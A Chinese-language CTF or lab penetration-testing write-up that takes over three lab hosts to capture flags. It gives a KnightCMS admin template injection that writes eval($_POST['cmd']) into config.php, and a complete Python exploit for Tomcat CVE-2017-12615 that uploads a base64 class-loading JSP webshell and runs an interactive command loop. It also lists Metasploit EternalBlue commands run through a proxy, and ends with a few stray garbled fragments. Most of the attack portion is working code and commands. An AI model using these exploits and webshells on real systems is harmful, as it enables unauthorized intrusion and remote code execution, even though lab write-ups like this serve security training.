lab2
重生之我是渗透测试工程师,被公司派遣去测试某网络的安全性。你的目标是成功获取所有服务器的权限,以评估网络安全状况。
先扫一下
192.168.10.10
骑士cms 先找后台路径
http://192.168.10.10:808/index.php?m=admin&c=index&a=login
账号admin
然后密码 admin123456
这个爆破有问题 我是直接试出来的
进入后台找到工具——风格模板——可用模板,抓包
GET /index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_POST['cmd']),' HTTP/1.1
Host: 192.168.10.10:808
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.10.10:808/index.php?m=admin&c=tpl&a=index
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=r01d2l2p7qcnqk5ku154bvdsc0; think_language=zh-CN; think_template=default修改tpl_dir
','a',eval($_POST['cmd']),'
访问/Application/Home/Conf/config.php
根目录获得flag1
192.168.10.20
8080端口
Apache Tomcat/8.5.19
网上poc
import requests
import optparse
import timeparse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')options,args = parse.parse_args()
#验证参数是否完整
if not options.URL or not options.PORT:print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')url = options.URL+':'+options.PORT
filename = '/backdoor.jsp'
payload = filename+'?pwd=023&i='headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
#木马
data = '''<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>'''
#上传木马文件
def upload(url):print('[*] 目标地址:'+url)try:respond = requests.put(url+filename+'/',headers=headers,data = data)#print(respond.status_code)if respond.status_code == 201 or respond.status_code == 204:#print('[*] 目标地址:'+url)print('[+] 木马上传成功')except Exception as e:print('[-] 上传失败')return 0#命令执行
def attack(url,cmd):try:respond = requests.get(url+payload+cmd)if respond.status_code == 200:print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())except Exception as e:print('[-] 命令执行错误')
if upload(url) == 0:exit()
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):cmd = input('>>>')if(cmd == 'quit'):breakattack(url,cmd)地址:http://192.168.10.20:8080/backdoor.jsp 密码:passwd
根目录得到flag2
192.168.20.30
vshell上线
查看ip
fscan扫描
wsl代理
proxychains -f /etc/proxychains4.conf msfconsole
永恒之蓝
proxychains -q msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 192.168.20.30
set lport 1433
exploit根目录得到flag3
)
)
 构造函数、析构函数)